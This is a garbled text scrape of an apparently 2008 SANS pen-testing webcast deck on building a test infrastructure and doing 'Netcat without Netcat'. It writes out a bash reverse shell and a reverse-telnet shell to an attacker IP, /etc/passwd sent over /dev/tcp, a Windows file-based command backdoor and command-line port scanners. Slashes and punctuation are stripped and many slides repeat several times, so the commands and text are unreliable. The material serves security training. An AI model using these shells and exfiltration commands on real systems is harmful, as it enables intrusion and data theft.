bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 3
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4
Building an Infrastructure for
Ethical Hackingbull Before starting a test you need an
infrastructure including ndash Software
ndash Hardware
ndash Network infrastructure
bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it
ndash But it is a reasonable starting point
ndash Wersquoll focus on software and network stuff
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 4
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4
Building an Infrastructure for
Ethical Hackingbull Before starting a test you need an
infrastructure including ndash Software
ndash Hardware
ndash Network infrastructure
bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it
ndash But it is a reasonable starting point
ndash Wersquoll focus on software and network stuff
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
